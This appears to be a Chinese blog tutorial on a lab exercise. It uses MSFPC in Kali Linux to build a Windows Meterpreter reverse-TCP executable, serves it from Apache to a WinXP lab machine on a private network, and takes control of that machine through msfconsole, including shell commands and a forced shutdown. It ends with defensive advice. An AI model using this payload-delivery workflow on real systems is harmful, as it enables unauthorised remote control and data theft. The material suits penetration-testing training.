在Kali中使用MSFPC生成被控端并进行远程控制

目录

 一、简介

二、实验过程

步骤一:生成Windows操作系统下的被控端 

​编辑

步骤二:把被控端放到kali的网站主目录下,启动apache2,到靶机下载被控端并运行。

步骤三:在kali中运行主控端

三、实验总结


 一、简介

       远程控制是指通过网络连接到另一台计算机,并在远程执行操作的过程。在网络安全领域,远程控制通常用于渗透测试、远程管理和监控等目的。     

      在kali linux中提供了一个名为MSFPC(全称为MSFvenom Payload Creator)的工具,它是MSFvenom的优化版,是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。来自用户的唯一必要的输入应该是定义平台(例如 windows)所需的有效载荷,或者他们希望有效载荷具有的文件扩展名(例如 exe)。

      本次实验我们将使用MSFPC生成windows下的被控端,并使用metasploit渗透工具进行远程控制。

测试windows系统实验使用的网络环境:
测试用windows系统(WinXPenSP)的IP: 192.168.107.133  
虚拟机Kali Linux 2的IP: 192.168.107.129

二、实验过程

步骤一:生成Windows操作系统下的被控端
 

/usr/bin/msfpc windows

输入命令生成被控端,选择本机IP


步骤二:把被控端放到kali的网站主目录下,启动apache2,到靶机下载被控端并运行。


1、把被控端放到kali的网站主目录下

cp windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/

将被控端复制到apache2网站目录下
 
2、启动apache2
检查apache2服务是否启动

systemctl start apache2
systemctl status apache2


 
3、到目标靶机(WinXPenSP3)下载被控端并运行
(1)给被控端改一个好记的名字。

mv /var/www/html/windows-meterpreter-staged-reverse-tcp.exe /var/www/html/windows.exe


 
(2)在目标靶机下载被控端

在xp靶机中打开ie浏览器,输入kali的ip地址和被控端的名字进行下载

http://192.168.107.129/windows.exe
 
(3)运行被控端

步骤三:在kali中运行主控端

配置对应的主控端

使用metasploit配置远程控制主控端

msfconsole -q -r '/home/kali/windows-meterpreter-staged-reverse-tcp-443-exe.rc'


 
步骤四:控制目标靶机一(WinXPenSP3)
1、查看会话,并选择会话。

输入sessions查看和选择会话
 

成功控制xp靶机
2、列出当前目录下的所有文件等。
 
3、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。
Shell


 
设置60秒后关机,并弹出提示信息“hello!”。

三、实验总结

       通过Kali Linux进行远程控制实验,可以帮助安全从业人员熟悉渗透测试工具的使用,加深对网络安全的理解。同时,也能够帮助提升应对网络攻击和安全事件的能力,为加强系统安全提供有力支持。

       MSFPC的出现,实现了自动化的载荷生成和远程控制,如果需要生成其他类型的Shell,只需替换linux、apk、php等参数即可,但MSFPC对比MSFvonom也有优缺点
优点:

快捷便利:MSFPC提供了简单易用的命令行工具,适合快速生成Shell。
适合懒人:通过MSFPC,无需繁琐的配置,非常适合懒惰的用户。
缺点:

功能相对较弱:与MSFvenom相比,MSFPC的功能相对有限,适合一些基本的Shell生成需求。

      在日常生活中,为了防止不法分子远程控制我们的计算机,窃取重要资料,我们应该做到以下几点:

1.安装杀毒软件,定期更新杀毒软件,确保其能够识别最新的病毒。

2.更新操作系统和应用程序,及时安装操作系统和应用程序的安全补丁,以修复已知的漏洞。

3.谨慎打开附件,不要随意打开来自未知发件人的邮件附件,避免下载不明文件。

4.使用防火墙,配置防火墙来监控网络流量,阻止恶意软件的入侵。

5.定期备份数据,定期备份重要数据,以防止数据丢失或被勒索软件加密。

6.注意网络安全,避免使用不安全的公共Wi-Fi网络,保护个人信息和数据安全。

  • 31
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值